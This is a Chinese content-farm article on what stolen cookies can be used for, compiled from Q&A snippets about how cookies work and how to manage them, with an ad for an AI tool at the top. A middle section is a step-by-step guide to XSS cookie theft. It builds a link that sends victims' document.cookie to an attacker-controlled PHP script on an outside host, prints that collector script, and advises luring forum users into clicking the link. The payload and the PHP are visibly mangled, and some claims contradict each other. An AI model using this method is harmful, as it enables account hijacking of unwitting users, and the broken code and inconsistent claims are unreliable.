正文

盜取cookie能做什么（盜取cookie的js）

發(fā)布時(shí)間：2023-06-13 12:52:27 稿源：創(chuàng)意嶺閱讀： 98

大家好！今天讓創(chuàng)意嶺的小編來(lái)大家介紹下關(guān)于盜取cookie能做什么的問(wèn)題，以下是小編對(duì)此問(wèn)題的歸納整理，讓我們一起來(lái)看看吧。

開(kāi)始之前先推薦一個(gè)非常厲害的Ai人工智能工具，一鍵生成原創(chuàng)文章、方案、文案、工作計(jì)劃、工作報(bào)告、論文、代碼、作文、做題和對(duì)話答疑等等

只需要輸入關(guān)鍵詞，就能返回你想要的內(nèi)容，有小程序、在線網(wǎng)頁(yè)版、PC客戶端和批量生成器

問(wèn)友Ai官網(wǎng)：https://ai.de1919.com。

本文目錄:

盜取cookie能獲得密碼嗎？
Cookie的作用是什么?為什么要阻止它?
什么是Cookie?有什么用？
cookie 是什么？做什么用？
cookie的作用，用途

盜取cookie能做什么（盜取cookie的js）

盜取cookie能獲得密碼嗎？

對(duì)吖，工作原理就是這樣

Cookie的作用是什么?為什么要阻止它?

Cookie是臨時(shí)文件的意思，保存你瀏覽網(wǎng)頁(yè)的痕跡，使得再次上同一頁(yè)面的時(shí)候提高網(wǎng)速，判斷你是否登錄過(guò)這個(gè)網(wǎng)站，有些可以幫你自動(dòng)登錄的。

Cookie 中記載的資料相有限，Cookie 是安全的。網(wǎng)站不可能經(jīng)由 Cookie 獲得你的 email 地址或是其它私人資料，更沒(méi)有辦法透過(guò) Cookie 來(lái)存取你的計(jì)算機(jī)。

Cookie的用途：服務(wù)器可以利用Cookies包含信息的任意性來(lái)篩選并經(jīng)常性維護(hù)這些信息，以判斷在HTTP傳輸中的狀態(tài)。Cookies最典型的應(yīng)用是判定注冊(cè)用戶是否已經(jīng)登錄網(wǎng)站，用戶可能會(huì)得到提示，是否在下一次進(jìn)入此網(wǎng)站時(shí)保留用戶信息以便簡(jiǎn)化登錄手續(xù)，這些都是Cookies的功用。另一個(gè)重要應(yīng)用場(chǎng)合是“購(gòu)物車”之類處理。用戶可能會(huì)在一段時(shí)間內(nèi)在同一家網(wǎng)站的不同頁(yè)面中選擇不同的商品，這些信息都會(huì)寫(xiě)入Cookies，以便在最后付款時(shí)提取信息。

什么是Cookie?有什么用？

最近比較火的話題，cookie是否安全？3.15晚會(huì)后引起了廣大網(wǎng)友對(duì)Cookie泄漏隱私的擔(dān)憂，下面來(lái)詳細(xì)解讀下Cookie，以及權(quán)威觀點(diǎn)。Cookies是一種能夠讓網(wǎng)站服務(wù)器把少量數(shù)據(jù)儲(chǔ)存到客戶端的硬盤(pán)或內(nèi)存，或是從客戶端的硬盤(pán)讀取數(shù)據(jù)的一種技術(shù)。Cookies是當(dāng)你瀏覽某網(wǎng)站時(shí)，由Web服務(wù)器置于你硬盤(pán)上的一個(gè)非常小的文本文件，它可以記錄你的用戶ID、密碼、瀏覽過(guò)的網(wǎng)頁(yè)、停留的時(shí)間等信息。當(dāng)你再次來(lái)到該網(wǎng)站時(shí)，網(wǎng)站通過(guò)讀取Cookies，得知你的相關(guān)信息，就可以做出相應(yīng)的動(dòng)作，如在頁(yè)面顯示歡迎你的標(biāo)語(yǔ)，或者讓你不用輸入ID、密碼就直接登錄等等。從本質(zhì)上講，它可以看作是你的身份證。但Cookies不能作為代碼執(zhí)行，也不會(huì)傳送病毒，且為你所專有，并只能由提供它的服務(wù)器來(lái)讀取。保存的信息片斷以名/值對(duì)(name-value pairs)的形式儲(chǔ)存，一個(gè)名/值對(duì)僅僅是一條命名的數(shù)據(jù)。一個(gè)網(wǎng)站只能取得它放在你的電腦中的信息，它無(wú)法從其它的Cookies文件中取得信息，也無(wú)法得到你的電腦上的其它任何東西。Cookies中的內(nèi)容大多數(shù)經(jīng)過(guò)了加密處理，因此一般用戶看來(lái)只是一些毫無(wú)意義的字母數(shù)字組合，只有服務(wù)器的CGI處理程序才知道它們真正的含義。由于Cookies是我們?yōu)g覽的網(wǎng)站傳輸?shù)接脩粲?jì)算機(jī)硬盤(pán)中的文本文件或內(nèi)存中的數(shù)據(jù)，因此它在硬盤(pán)中存放的位置與使用的操作系統(tǒng)和瀏覽器密切相關(guān)。實(shí)際上，Cookie中保存的用戶名、密碼等個(gè)人敏感信息通常經(jīng)過(guò)加密，很難將其反向綠色。但這并不意味著絕對(duì)安全，黑客可通過(guò)木馬病毒盜取用戶瀏覽器 Cookie，直接通過(guò)偷取的Cookie騙取網(wǎng)站信任?？梢钥闯觯抉R病毒入侵用戶電腦是導(dǎo)致用戶個(gè)人信息泄露的一大元兇。自1993年 Cookie誕生以來(lái)，其就擁有專屬性原則，即A網(wǎng)站存放在Cookie中的用戶信息，B網(wǎng)站是沒(méi)有權(quán)限直接獲取的。但是，現(xiàn)在一些第三方廣告聯(lián)盟的代碼使用范圍很廣。這就造成用戶在A網(wǎng)站搜索了一個(gè)關(guān)鍵字，用戶繼續(xù)訪問(wèn)B網(wǎng)站，由于B網(wǎng)站也使用了同一家的第三方廣告代碼，這個(gè)代碼可以從Cookie中獲取用戶在A網(wǎng)站的搜索行為，進(jìn)而展示更精準(zhǔn)的推廣廣告。比如搜索糖尿病等關(guān)鍵詞，再訪問(wèn)其聯(lián)盟網(wǎng)站，頁(yè)面會(huì)立刻出現(xiàn)糖尿病治療廣告。如果并未事先告之，經(jīng)用戶同意，此做法有對(duì)隱私構(gòu)成侵犯的嫌疑。目前這個(gè)還處在灰色地帶。因此，跨站Cookie恰恰就是用戶隱私泄露的罪魁禍?zhǔn)?，所以?制網(wǎng)站使用跨站Cookie，給用戶提供禁止跟蹤(DNT)功能選項(xiàng)已成為當(dāng)務(wù)之急。據(jù)了解，目前IE、Chrome、360、搜狗等瀏覽器均可以快速清除用戶瀏覽器網(wǎng)頁(yè)的Cookie信息。但從目前整體的隱私安全保護(hù)環(huán)境來(lái)看，安全軟件仍然存在著巨大的防護(hù)缺口。

盜取cookie能做什么（盜取cookie的js）

cookie 是什么？做什么用？

Cookie，有時(shí)也用其復(fù)數(shù)形式Cookies，指某些網(wǎng)站為了辨別用戶身份而儲(chǔ)存在用戶本地終端上的數(shù)據(jù)（通常經(jīng)過(guò)加密）。定義于RFC2109。它是網(wǎng)景公司的前雇員Lou Montulli在1993年3月的發(fā)明。
用途
[編輯本段]
服務(wù)器可以利用Cookies包含信息的任意性來(lái)篩選并經(jīng)常性維護(hù)這些信息，以判斷在HTTP傳輸中的狀態(tài)。Cookies最典型的應(yīng)用是判定注冊(cè)用戶是否已經(jīng)登錄網(wǎng)站，用戶可能會(huì)得到提示，是否在下一次進(jìn)入此網(wǎng)站時(shí)保留用戶信息以便簡(jiǎn)化登錄手續(xù)，這些都是Cookies的功用。另一個(gè)重要應(yīng)用場(chǎng)合是“購(gòu)物車”之類處理。用戶可能會(huì)在一段時(shí)間內(nèi)在同一家網(wǎng)站的不同頁(yè)面中選擇不同的商品，這些信息都會(huì)寫(xiě)入Cookies，以便在最后付款時(shí)提取信息。
使用和禁用Cookie
用戶可以改變?yōu)g覽器的設(shè)置，以使用或者禁用Cookies。
微軟 Internet Explorer
工具 > Internet選項(xiàng) > 隱私頁(yè)
調(diào)節(jié)滑塊或者點(diǎn)擊“高級(jí)”，進(jìn)行設(shè)置.
Mozilla Firefox
工具 > 選項(xiàng) > 隱私
(注: 在Linux版本中，可能會(huì)是如下操作：編輯 > 屬性 > 隱私，而Mac則是：Firefox > 屬性 > 隱私)
設(shè)置Cookies選項(xiàng)
設(shè)定阻止/允許的各個(gè)域內(nèi)Cookie
查看Cookies管理窗口，檢查現(xiàn)存Cookie信息，選擇刪除或者阻止它們
蘋(píng)果計(jì)算機(jī) Safari
Safari > 預(yù)置 > 安全標(biāo)簽
選擇以下的選項(xiàng)
總是接受 Cookies
永不接受 Cookies
接受 Cookies 僅從您瀏覽的站點(diǎn) (例如，不接受來(lái)自其它站點(diǎn)的廣告) 預(yù)設(shè)的選項(xiàng).
您可以顯示所有駐留在您瀏覽器中的 cookies，也可隨時(shí)將它們之一刪除。
Konqueror
如果沒(méi)有設(shè)置cookie列表，請(qǐng)記住在域名前面加入“.”，例如.baidu.org，否則百度將不會(huì)讀取cookie(針對(duì)KDE 3.3)。
生存周期
[編輯本段]
Cookie可以保持登錄信息到用戶下次與服務(wù)器的會(huì)話，換句話說(shuō)，下次訪問(wèn)同一網(wǎng)站時(shí)，用戶會(huì)發(fā)現(xiàn)不必輸入用戶名和密碼就已經(jīng)登錄了（當(dāng)然，不排除用戶手工刪除Cookie）。而還有一些Cookie在用戶退出會(huì)話的時(shí)候就被刪除了，這樣可以有效保護(hù)個(gè)人隱私。
識(shí)別功能
[編輯本段]
如果在一臺(tái)計(jì)算機(jī)中安裝多個(gè)瀏覽器，每個(gè)瀏覽器都會(huì)獨(dú)立的空間存放cookie。因?yàn)閏ookie中不但可以確認(rèn)用戶，還能包含計(jì)算機(jī)和瀏覽器的信息，所以一個(gè)用戶用不同的瀏覽器登錄或者用不同的計(jì)算機(jī)登錄，都會(huì)得到不同的cookie信息，另一方面，對(duì)于在同一臺(tái)計(jì)算機(jī)上使用同一瀏覽器的多用戶群，cookie不會(huì)區(qū)分他們的身份，除非他們使用不同的用戶名登錄。
反對(duì)cookies者
一些人反對(duì)cookie在網(wǎng)絡(luò)中的應(yīng)用，他們的理由如下：
識(shí)別不精確
參見(jiàn)上面的識(shí)別功能
隱私，安全和廣告
Cookies在某種程度上說(shuō)已經(jīng)嚴(yán)重危及用戶的隱私和安全。其中的一種方法是：一些公司的高層人員為了某種目的（譬如市場(chǎng)調(diào)研）而訪問(wèn)了從未去過(guò)的網(wǎng)站（通過(guò)搜索引擎查到的），而這些網(wǎng)站包含了一種叫做網(wǎng)頁(yè)臭蟲(chóng)的圖片，該圖片透明，且只有一個(gè)象素大?。ㄒ员汶[藏），它們的作用是將所有訪問(wèn)過(guò)此頁(yè)面的計(jì)算機(jī)寫(xiě)入cookie。而后，電子商務(wù)網(wǎng)站將讀取這些cookie信息，并尋找寫(xiě)入這些cookie的網(wǎng)站，隨即發(fā)送包含了針對(duì)這個(gè)網(wǎng)站的相關(guān)產(chǎn)品廣告的垃圾郵件給這些高級(jí)人員。
因?yàn)楦哂嗅槍?duì)性，使得這套系統(tǒng)行之有效，收到郵件的客戶或多或少表現(xiàn)出對(duì)產(chǎn)品的興趣。這些站點(diǎn)一旦寫(xiě)入cookie并使其運(yùn)作，就可以從電子商務(wù)網(wǎng)站那里獲得報(bào)酬，以維系網(wǎng)站的生存。
鑒于隱藏的危害性，瑞典已經(jīng)通過(guò)對(duì)cookie立法，要求利用cookie的網(wǎng)站必須說(shuō)明cookie的屬性，并且指導(dǎo)用戶如何禁用cookie。
偷竊Cookie和腳本攻擊
[編輯本段]
盡管cookie沒(méi)有病毒那么危險(xiǎn)，但它仍包含了一些敏感信息：用戶名，計(jì)算機(jī)名，使用的瀏覽器和曾經(jīng)訪問(wèn)的網(wǎng)站。用戶不希望這些內(nèi)容泄漏出去，尤其是當(dāng)其中還包含有私人信息的時(shí)候。
這并非危言聳聽(tīng)，一種名為Cross site scripting的工具可以達(dá)到此目的。在受到Cross site scripting攻擊時(shí)，cookie盜賊和cookie毒藥將竊取內(nèi)容。一旦cookie落入攻擊者手中，它將會(huì)重現(xiàn)其價(jià)值。
cookie盜賊：搜集用戶cookie并發(fā)給攻擊者的黑客。攻擊者將利用cookie信息通過(guò)合法手段進(jìn)入用戶帳戶。
cookie毒藥：利用安全機(jī)制，攻擊者加入代碼從而改寫(xiě)cookie內(nèi)容，以便持續(xù)攻擊。
Cookies的替代品
[編輯本段]
鑒于cookie的局限和反對(duì)者的聲音，有如下一些替代方法：
Brownie方案，是一項(xiàng)開(kāi)放源代碼工程，由SourceForge發(fā)起。Brownie曾被用以共享在不同域中的接入，而cookies則被構(gòu)想成單一域中的接入。這項(xiàng)方案已經(jīng)停止開(kāi)發(fā)。
P3P，用以讓用戶獲得更多控制個(gè)人隱私權(quán)利的協(xié)議。在瀏覽網(wǎng)站時(shí)，它類似于cookie。
在與服務(wù)器傳輸數(shù)據(jù)時(shí)，通過(guò)在地址后面添加唯一查詢串，讓服務(wù)器識(shí)別是否合法用戶，也可以避免使用cookie。
cookie的具體含義
[編輯本段]
cookie 歷來(lái)指就著牛奶一起吃的點(diǎn)心。然而，在因特網(wǎng)內(nèi)，“cookie”這個(gè)字有了完全不同的意思。那么“cookie”到底是什么呢？“Cookie”是小量信息，由網(wǎng)絡(luò)服務(wù)器發(fā)送出來(lái)以存儲(chǔ)在網(wǎng)絡(luò)瀏覽器上，從而下次這位獨(dú)一無(wú)二的訪客又回到該網(wǎng)絡(luò)服務(wù)器時(shí)，可從該瀏覽器讀回此信息。這是很有用的，讓瀏覽器記住這位訪客的特定信息，如上次訪問(wèn)的位置、花費(fèi)的時(shí)間或用戶首選項(xiàng)（如樣式表）。Cookie 是個(gè)存儲(chǔ)在瀏覽器目錄的文本文件，當(dāng)瀏覽器運(yùn)行時(shí)，存儲(chǔ)在 RAM 中。一旦閣下從該網(wǎng)站或網(wǎng)絡(luò)服務(wù)器退出，Cookie 也可存儲(chǔ)在計(jì)算機(jī)的硬驅(qū)上。I3I.net的打算是，當(dāng)訪客結(jié)束其瀏覽器對(duì)話時(shí)，即終止I3I.net的所有 cookie。
Cookie 有哪些用途？
Cookie 的用途之一是存儲(chǔ)用戶在特定網(wǎng)站上的密碼和 ID。另外，也用于存儲(chǔ)起始頁(yè)的首選項(xiàng)。在提供個(gè)人化查看的網(wǎng)站上，將要求閣下的網(wǎng)絡(luò)瀏覽器利用閣下計(jì)算機(jī)硬驅(qū)上的少量空間來(lái)儲(chǔ)存這些首選項(xiàng)。這樣，每次閣下登錄該網(wǎng)站時(shí)，閣下的瀏覽器將檢查閣下是否就該唯一的服務(wù)器有任何預(yù)先定義的首選項(xiàng)（cookie）。如果有的話，瀏覽器將此 cookie 隨閣下對(duì)網(wǎng)頁(yè)的請(qǐng)求一起發(fā)送給服務(wù)器。Microsoft 和 Netscape 使用 cookie 在其網(wǎng)站上創(chuàng)建個(gè)人起始頁(yè)。各家公司利用 cookie 的一般用途包括：在線定貨系統(tǒng)、網(wǎng)站個(gè)人化和網(wǎng)站跟蹤。
網(wǎng)站個(gè)人化是 cookie 最有益的用途之一。例如，當(dāng)誰(shuí)來(lái)到 CNN 網(wǎng)站，但并不想查看任何商務(wù)新聞。網(wǎng)站允許他將該項(xiàng)選為選項(xiàng)。從那時(shí)起（或者直到 cookie 逾期），他在訪問(wèn) CNN 網(wǎng)頁(yè)時(shí)將不會(huì)讀到商務(wù)新聞。
這些 Cookie 是如何起作用的？
文檔的 HTML 代碼中的命令行告訴瀏覽器設(shè)置某一名稱或數(shù)值的 cookie。以下是用來(lái)設(shè)置 cookie 腳本的一個(gè)普通實(shí)例。
Set-Cookie: name = VALUE;
expires = DATE;
path = PATH;
domain = DOMAIN_NAME;
那么安全性如何？HTTP Cookie 不能用來(lái)從閣下的硬驅(qū)上檢索個(gè)人數(shù)據(jù)、放置病毒、得到閣下的電子郵件地址或偷竊有關(guān)閣下身份的敏感信息；然而，HTTP Cookie 可用來(lái)跟蹤閣下在特定網(wǎng)站上的所到之處。不使用 cookie 就很難進(jìn)行網(wǎng)站跟蹤。
至于其他一切與因特網(wǎng)有關(guān)的事，如同閣下所希望的那樣是匿名的。沒(méi)有網(wǎng)站知道閣下是誰(shuí)，除非閣下自己透露給網(wǎng)站。同時(shí)，cookie 只是為了更好地了解使用模式并改進(jìn)網(wǎng)站訪客的效率而采用的一個(gè)網(wǎng)站跟蹤統(tǒng)計(jì)手段而已。
如果網(wǎng)站設(shè)計(jì)師旨在使網(wǎng)頁(yè)能與訪客更具互動(dòng)作用，或者若設(shè)計(jì)師計(jì)劃讓訪客自定義網(wǎng)站的外觀，則就需要使用 cookie。而且，如果閣下想要網(wǎng)站在某些情況下改變其外觀，cookie 則提供了一條快速、容易的途徑，讓閣下的 HTML 頁(yè)面按需要而改變。最新型的服務(wù)器使用 cookie 有助于數(shù)據(jù)庫(kù)的互動(dòng)性，進(jìn)而改進(jìn)網(wǎng)站的整體互動(dòng)性。
Cookie在英文中是小甜品的意思，而這個(gè)詞我們總能在瀏覽器中看到，食品怎么會(huì)跟瀏覽器扯上關(guān)系呢？在你瀏覽以前登陸過(guò)的網(wǎng)站時(shí)可能會(huì)在網(wǎng)頁(yè)中出現(xiàn)：你好XX，感覺(jué)很親切，就好像是吃了一個(gè)小甜品一樣。這其實(shí)是通過(guò)訪問(wèn)你主機(jī)里邊的一個(gè)文件來(lái)實(shí)現(xiàn)的，因此這個(gè)文件也就被稱為了Cookie。想全面了解Cookie嗎？看看下文吧！
一.了解Cookie 適用對(duì)象：初級(jí)讀者
Cookie是當(dāng)你瀏覽某網(wǎng)站時(shí)，網(wǎng)站存儲(chǔ)在你機(jī)器上的一個(gè)小文本文件，它記錄了你的用戶ID，密碼、瀏覽過(guò)的網(wǎng)頁(yè)、停留的時(shí)間等信息，當(dāng)你再次來(lái)到該網(wǎng)站時(shí)，網(wǎng)站通過(guò)讀取Cookie，得知你的相關(guān)信息，就可以做出相應(yīng)的動(dòng)作，如在頁(yè)面顯示歡迎你的標(biāo)語(yǔ)，或者讓你不用輸入ID、密碼就直接登錄等等。你可以在IE的“工具/Internet選項(xiàng)”的“常規(guī)”選項(xiàng)卡中，選擇“設(shè)置/查看文件”，查看所有保存到你電腦里的Cookie。這些文件通常是以u(píng)ser@domain格式命名的，user是你的本地用戶名，domain是所訪問(wèn)的網(wǎng)站的域名。如果你使用NetsCape瀏覽器，則存放在“C:\PROGRAMFILES\NETSCAPE\USERS\”里面，與IE不同的是，NETSCAPE是使用一個(gè)Cookie 文件記錄所有網(wǎng)站的Cookies。
為了保證上網(wǎng)安全我們需要對(duì)Cookie進(jìn)行適當(dāng)設(shè)置。打開(kāi)“工具/Internet選項(xiàng)”中的“隱私”選項(xiàng)卡（注意該設(shè)置只在IE6.0中存在，其他版本IE可以在“工具/Internet選項(xiàng)”的“安全”標(biāo)簽中單擊“自定義級(jí)別”按鈕，進(jìn)行簡(jiǎn)單調(diào)整），調(diào)整Cookie的安全級(jí)別。通常情況，可以將滑塊調(diào)整到“中高”或者“高”的位置。多數(shù)的論壇站點(diǎn)需要使用Cookie信息，如果你從來(lái)不去這些地方，可以將安全級(jí)調(diào)到“阻止所有Cookies”。如果只是為了禁止個(gè)別網(wǎng)站的Cookie，可以單擊“編輯”按鈕，將要屏蔽的網(wǎng)站添加到列表中。在“高級(jí)”按鈕選項(xiàng)中，你可以對(duì)第一方Cookie和第三方的Cookie進(jìn)行設(shè)置，第一方Cookie是你正在瀏覽的網(wǎng)站的Cookie，第三方Cookie非正在瀏覽的網(wǎng)站發(fā)給你的Cookie，通常要對(duì)第三方Cookie選擇“拒絕”，如圖1。你如果需要保存Cookie，可以使用IE的“導(dǎo)入導(dǎo)出”功能，打開(kāi)“文件/導(dǎo)入導(dǎo)出”，按提示操作即可。
Cookie中的內(nèi)容大多數(shù)經(jīng)過(guò)了加密處理，因此在我們看來(lái)只是一些毫無(wú)意義的字母數(shù)字組合，只有服務(wù)器的CGI處理程序才知道它們真正的含義。通過(guò)一些軟件我們可以查看到更多的內(nèi)容，使用Cookie Pal軟件查看到的Cookie信息，如圖2所示。它為我們提供了Server、Expires、Name、value等選項(xiàng)的內(nèi)容。其中，Server是存儲(chǔ)Cookie的網(wǎng)站，Expires記錄了Cookie的時(shí)間和生命期，Name和value字段則是具體的數(shù)據(jù)
二、Cookie的傳遞流程適用對(duì)象：中級(jí)讀者
當(dāng)在瀏覽器地址欄中鍵入了一個(gè)Web站點(diǎn)的URL，瀏覽器會(huì)向該Web站點(diǎn)發(fā)送一個(gè)讀取網(wǎng)頁(yè)的請(qǐng)求，并將結(jié)果在顯示器上顯示。這時(shí)該網(wǎng)頁(yè)在你的電腦上尋找Amazon網(wǎng)站設(shè)置的Cookie文件，如果找到，瀏覽器會(huì)把Cookie文件中的數(shù)據(jù)連同前面輸入的URL一同發(fā)送到Amazon服務(wù)器。服務(wù)器收到Cookie數(shù)據(jù)，就會(huì)在他的數(shù)據(jù)庫(kù)中檢索你的ID，你的購(gòu)物記錄、個(gè)人喜好等信息，并記錄下新的內(nèi)容，增加到數(shù)據(jù)庫(kù)和Cookie文件中去。如果沒(méi)有檢測(cè)到Cookie或者你的Cookie信息與數(shù)據(jù)庫(kù)中的信息不符合，則說(shuō)明你是第一次瀏覽該網(wǎng)站，服務(wù)器的CGI程序?qū)槟銊?chuàng)建新的ID信息，并保存到數(shù)據(jù)庫(kù)中。
Cookie是利用了網(wǎng)頁(yè)代碼中的HTTP頭信息進(jìn)行傳遞的，瀏覽器的每一次網(wǎng)頁(yè)請(qǐng)求，都可以伴隨Cookie傳遞，例如，瀏覽器的打開(kāi)或刷新網(wǎng)頁(yè)操作。服務(wù)器將Cookie添加到網(wǎng)頁(yè)的HTTP頭信息中，伴隨網(wǎng)頁(yè)數(shù)據(jù)傳回到你的瀏覽器，瀏覽器會(huì)根據(jù)你電腦中的Cookie設(shè)置選擇是否保存這些數(shù)據(jù)。如果瀏覽器不允許Cookie保存，則關(guān)掉瀏覽器后，這些數(shù)據(jù)就消失。Cookie在電腦上保存的時(shí)間是不一樣的，這些都是由服務(wù)器的設(shè)置不同決定得。Cookie有一個(gè)Expires（有效期）屬性，這個(gè)屬性決定了Cookie的保存時(shí)間，服務(wù)器可以通過(guò)設(shè)定Expires字段的數(shù)值，來(lái)改變Cookie的保存時(shí)間。如果不設(shè)置該屬性，那么Cookie只在瀏覽網(wǎng)頁(yè)期間有效，關(guān)閉瀏覽器，這些Cookie自動(dòng)消失，絕大多數(shù)網(wǎng)站屬于這種情況。通常情況下，Cookie包含Server、Expires、Name、value這幾個(gè)字段，其中對(duì)服務(wù)器有用的只是Name和value字段，Expires等字段的內(nèi)容僅僅是為了告訴瀏覽器如何處理這些Cookies。
三、Cookie的編程實(shí)現(xiàn) 適用對(duì)象：高級(jí)讀者
多數(shù)網(wǎng)頁(yè)編程語(yǔ)言都提供了對(duì)Cookie的支持。如javascript、VBScript、Delphi、ASP、SQL、PHP、C#等。在這些面向?qū)ο蟮木幊陶Z(yǔ)言中，對(duì)Cookie的編程利用基本上是相似的，大體過(guò)程為：先創(chuàng)建一個(gè)Cookie對(duì)象（Object），然后利用控制函數(shù)對(duì)Cookie進(jìn)行賦值、讀取、寫(xiě)入等操作。那么如何通過(guò)代碼來(lái)獲取其他用戶Cookie中的敏感信息？下面進(jìn)行簡(jiǎn)單的介紹。
該方法主要有兩步，首先要定位你需要收集Cookie的網(wǎng)站，并對(duì)其進(jìn)行分析，并構(gòu)造URL；然后編制收集Cookie的PHP代碼，并將其放到你可以控制的網(wǎng)站上，當(dāng)不知情者單擊了你構(gòu)造的URL后可以執(zhí)行該P(yáng)HP代碼。下面我們看具體的實(shí)現(xiàn)過(guò)程。
1.分析并構(gòu)造URL
首先打開(kāi)我們要收集Cookie的網(wǎng)站，這里假設(shè)是http://www.XXX.net，登陸網(wǎng)站輸入用戶名“”（不含引號(hào)），對(duì)數(shù)據(jù)進(jìn)行分析抓包，得到形如“http://www.XXX.net/txl/login/login....x=28&ok.y=6”的代碼，將“”更換為“”再試；如果執(zhí)行成功，就開(kāi)始構(gòu)造URL：“http://www.cbifamily.org/cbi.php?\"%2Bdocuments.cookie)&passwd=&ok.x=28&ok.y=6" target="_blank">http://www.XXX.net/txl/login/log ;... swd=&ok.x=28&ok.y=6”。其中http:///www.cbifamily.org/cbi.php就是你能夠控制的某臺(tái)主機(jī)上的一個(gè)腳本。需要注意的是“%2B”為符號(hào)“+”的URL編碼，因?yàn)椤?”將被作為空格處理。該URL就可以在論壇中發(fā)布，誘使別人點(diǎn)擊了。
2.編制PHP腳本
該腳本的作用就是收集Cookie文件，具體內(nèi)容如下：
$info = getenv("QUERY_STRING";
if ($info) {
$fp = fopen("info.txt","a";
fwrite($fp,$info."\n";
fclose($fp);
}
header("Location: http://www.XXX.net\";
?>
四、Cookie的安全問(wèn)題適用對(duì)象：所有希望上網(wǎng)安全的讀者
1.Cookie欺騙
Cookie記錄著用戶的帳戶ID、密碼之類的信息，如果在網(wǎng)上傳遞，通常使用的是MD5方法加密。這樣經(jīng)過(guò)加密處理后的信息，即使被網(wǎng)絡(luò)上一些別有用心的人截獲，也看不懂，因?yàn)樗吹降闹皇且恍o(wú)意義的字母和數(shù)字。然而，現(xiàn)在遇到的問(wèn)題是，截獲Cookie的人不需要知道這些字符串的含義，他們只要把別人的Cookie向服務(wù)器提交，并且能夠通過(guò)驗(yàn)證，他們就可以冒充受害人的身份，登陸網(wǎng)站。這種方法叫做Cookie欺騙。Cookie欺騙實(shí)現(xiàn)的前提條件是服務(wù)器的驗(yàn)證程序存在漏洞，并且冒充者要獲得被冒充的人的Cookie信息。目前網(wǎng)站的驗(yàn)證程序要排除所有非法登錄是非常困難的，例如，編寫(xiě)驗(yàn)證程序使用的語(yǔ)言可能存在漏洞。而且要獲得別人Cookie是很容易的，用支持Cookie的語(yǔ)言編寫(xiě)一小段代碼就可以實(shí)現(xiàn)（具體方法見(jiàn)三），只要把這段代碼放到網(wǎng)絡(luò)里，那么所有人的Cookie都能夠被收集。如果一個(gè)論壇允許HTML代碼或者允許使用Flash標(biāo)簽就可以利用這些技術(shù)收集Cookie的代碼放到論壇里，然后給帖子取一個(gè)吸引人的主題，寫(xiě)上有趣的內(nèi)容，很快就可以收集到大量的Cookie。在論壇上，有許多人的密碼就被這種方法盜去的。至于如何防范，目前還沒(méi)有特效藥，我們也只能使用通常的防護(hù)方法，不要在論壇里使用重要的密碼，也不要使用IE自動(dòng)保存密碼的功能，以及盡量不登陸不了解底細(xì)的網(wǎng)站。
2.Flash的代碼隱患
Flash中有一個(gè)getURL（）函數(shù)，F(xiàn)lash可以利用這個(gè)函數(shù)自動(dòng)打開(kāi)指定的網(wǎng)頁(yè)。因此它可能把你引向一個(gè)包含惡意代碼的網(wǎng)站。打個(gè)比方，當(dāng)你在自己電腦上欣賞精美的Flash動(dòng)畫(huà)時(shí)，動(dòng)畫(huà)幀里的代碼可能已經(jīng)悄悄地連上網(wǎng)，并打開(kāi)了一個(gè)極小的包含有特殊代碼的頁(yè)面。這個(gè)頁(yè)面可以收集你的Cookie、也可以做一些其他的事情，比如在你的機(jī)器上種植木馬甚至格式化你的硬盤(pán)等等。對(duì)于Flash的這種行為，網(wǎng)站是無(wú)法禁止的，因?yàn)檫@是Flash文件的內(nèi)部行為。我們所能做到的，如果是在本地瀏覽盡量打開(kāi)防火墻，如果防火墻提示的向外發(fā)送的數(shù)據(jù)包并不為你知悉，最好禁止。如果是在Internet上欣賞，最好找一些知名的大網(wǎng)站。

cookie的作用，用途

作用：可以利用cookies跟蹤統(tǒng)計(jì)用戶訪問(wèn)該網(wǎng)站的習(xí)慣，比如什么時(shí)間訪問(wèn)，訪問(wèn)了哪些頁(yè)面，在每個(gè)網(wǎng)頁(yè)的停留時(shí)間等。利用這些信息，一方面是可以為用戶提供個(gè)性化的服務(wù)，另一方面，也可以作為了解所有用戶行為的工具，對(duì)于網(wǎng)站經(jīng)營(yíng)策略的改進(jìn)有一定參考價(jià)值。

用途：存儲(chǔ)用戶在特定網(wǎng)站上的密碼和 ID。另外，也用于存儲(chǔ)起始頁(yè)的首選項(xiàng)。在提供個(gè)人化查看的網(wǎng)站上，將利用計(jì)算機(jī)硬驅(qū)上的少量空間來(lái)儲(chǔ)存這些首選項(xiàng)。這樣，每次登錄該網(wǎng)站時(shí)，瀏覽器將檢查是否有cookie。如果有，瀏覽器將此 cookie 隨網(wǎng)頁(yè)的請(qǐng)求一起發(fā)送給服務(wù)器。

擴(kuò)展資料

Cookie，有時(shí)也用其復(fù)數(shù)形式Cookies，指某些網(wǎng)站為了辨別用戶身份、進(jìn)行session跟蹤而儲(chǔ)存在用戶本地終端上的數(shù)據(jù)（通常經(jīng)過(guò)加密）。定義于RFC2109和2965都已廢棄，最新取代的規(guī)范是RFC6265。

cookie主要應(yīng)用于服務(wù)器，可以利用Cookies包含信息的任意性來(lái)篩選并經(jīng)常性維護(hù)這些信息，以判斷在HTTP傳輸中的狀態(tài)。Cookies最典型的應(yīng)用是判定注冊(cè)用戶是否已經(jīng)登錄網(wǎng)站，用戶可能會(huì)得到提示，是否在下一次進(jìn)入此網(wǎng)站時(shí)保留用戶信息以便簡(jiǎn)化登錄手續(xù)，這些都是Cookies的功用。

另一個(gè)重要應(yīng)用場(chǎng)合是“購(gòu)物車”之類處理。用戶可能會(huì)在一段時(shí)間內(nèi)在同一家網(wǎng)站的不同頁(yè)面中選擇不同的商品，這些信息都會(huì)寫(xiě)入Cookies，以便在最后付款時(shí)提取信息。

參考資料來(lái)源：百度百科-cookie

參考資料來(lái)源：百度百科-cookies

以上就是關(guān)于盜取cookie能做什么相關(guān)問(wèn)題的回答。希望能幫到你，如有更多相關(guān)問(wèn)題，您也可以聯(lián)系我們的客服進(jìn)行咨詢，客服也會(huì)為您講解更多精彩的知識(shí)和內(nèi)容。